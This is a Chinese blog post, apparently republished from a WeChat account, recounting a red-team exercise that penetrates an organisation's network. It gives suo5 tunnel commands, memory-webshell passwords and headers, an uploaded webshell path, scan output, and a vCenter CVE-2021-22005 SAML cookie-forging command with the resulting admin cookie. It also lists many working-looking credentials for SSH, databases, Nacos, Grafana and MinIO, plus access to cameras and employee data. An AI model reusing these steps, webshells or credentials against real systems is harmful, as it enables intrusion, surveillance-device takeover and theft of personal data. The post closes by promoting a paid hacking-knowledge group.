0x1帆软反序列化漏洞RCE
url: https://mci.xxxx.com/webroot/*
请求头: Referer: Hijt
密码: test:test123
使用说明: ./suo5 -H 'Referer: Hijt' -t http://
./suo5 -l 0.0.0.0:7788 --auth test:test123 -H 'Referer: Hijt' -t http://
冰蝎3.0 内存马注入完成,请自行连接判断!
url: https://mci.xxxx.com/webroot/*
请求头: moresec: wuhu
密码: rebeyond
https://mci.xxxx.com/webroot/xx rebeyond
11张网卡含docker,这里就不列出来了
0x2内网突突突
还有192段的这就不列出来了
172.*.*.*
[Vcenter]
[*] WebTitle https://172.16.10.10 code:200 len:3618 title:" + ID_VC_Welcome + "
[*] WebTitle https://172.16.10.10:443/ code:200 len:3618 title:" + ID_VC_Welcome + "
[SSH]
[+] SSH 172.16.10.27:22:admin 1qaz@WSX
[+] SSH 172.16.10.25:22:admin 1qaz@WSX
[INFO]
[+] InfoScan https://172.16.10.10 [VMware vSphere]
[+] InfoScan https://172.16.10.10:443/ [VMware vSphere]
[POC]
[+] PocScan https://172.16.10.7 poc-yaml-vmware-vrealize-cve-2021-21975-ssrf
[+] PocScan https://172.16.10.7 poc-yaml-vmware-vrealize-cve-2021-21975-ssrf
0x2.1服务器权限
利用nacos2024新洞利用后拿下了2个
http://192.168.32.1:8848/nacos/cXsXGBjv
Vwihgi
请求头: Referer: Tixr
http://192.168.100.131:8848/nacos/xxx
"内存马注入成功,密码: Vwihgi 请求头: Referer: Tixr
任意文件上传拿下了一个
http://192.168.31.12/Upload/img/1.aspx
hvv2028
web目录
海康综合安防任意用户添加
https://192.168.31.15:443/portal/cas/loginPage?service=https://192.168.31.15:443/portal
minio/1qaz@WSX
122个摄像头权限(个)放在下面摄像头处
海康综合安防第二个
边界机器的容器权限100多个
0x3数据库19个
这里就不一一列出来了,数据比较敏感我怕我进去,这里就放一个图就行了
192.168.100.86:3308
root/ad123456pwd
4w条员工信息,原谅我的厚码。
0x3nacos11个
就不一一列出了都是Nday弱口令或者绕过进去的要么就是弱口令nacos/nacos
0x3.1. grafana1个
http://192.168.32.1:3000/
admin/admin@123
0x3.2. minio2个
弱口令:
minio
minio123
0x4. MCI管理权限
存在345个摄像头权限
敏感信息1.8w条
0x4.内网运维资产表
http://192.168.100.202/
0x5. 最后堡垒机权限2个
0x5.1. 192.168.100.197(泛微运维系统)
http://192.168.100.197:9081/#/main/dashboard
sysadmin/1qaz@WSX 更改密码为1qaz@WSX
172.16.10.10-Vcenter(CVE-2021-22005)
https://172.16.10.10/idm/..;/xx.jsp
在vCenter中从/storage/db/vmware-vmdir/data.mdb提取IdP证书,为管理员⽤户创建 SAML请求最后使⽤ vCenterserver进⾏身份验证并获得有效的管理员 cookie。
利⽤ SAML解密脚本生成 Cookie:
python vcenter_saml_login.py -p data.mdb -t 172.16.10.10
Cookie: VSPHERE-UI-JSESSIONID=3AEBD996A696016ED81D3F411BB1B197
拿到管理员 cookie 之后在用插件替换 cookie 访问/ui 就可直接登录,这里需要删除默认的 sessionid,直接添加新的 cookie
成功登录到后台
0x5.2. 域名权限2个
这里是通过vcenter直接登录的没锁屏直接登上来了,哈哈哈
还有些别的web权限就不说了,此次hw让我学到vcenter后渗透+泛微运维系统的重置密码,文章中 有些不理解可加星球和我细聊或私信我公众号也可以哦大佬们!
星球介绍
星球致力于真实红队,hw、src、apt等技术分享,还有就是星球刚创建不久,资料什么都在着手分享,大家需要什么直接评论或者留言,一起进步一起学习,有想法的师傅可以一起运营。
最近更新
原文始发于微信公众号(web安全初心实验室):记一次某地市h-v-v打穿某重点单位
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论